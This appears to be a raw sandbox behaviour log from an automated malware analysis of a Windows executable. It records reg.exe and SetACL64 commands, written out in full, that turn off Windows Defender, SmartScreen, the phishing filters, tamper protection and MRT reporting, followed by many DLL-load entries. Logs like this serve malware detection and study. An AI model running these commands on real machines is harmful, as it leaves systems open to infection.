Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: dwmapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: oleacc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: shfolder.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: activeds.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: adsldpc.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: dfscli.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe | Jump to behavior |
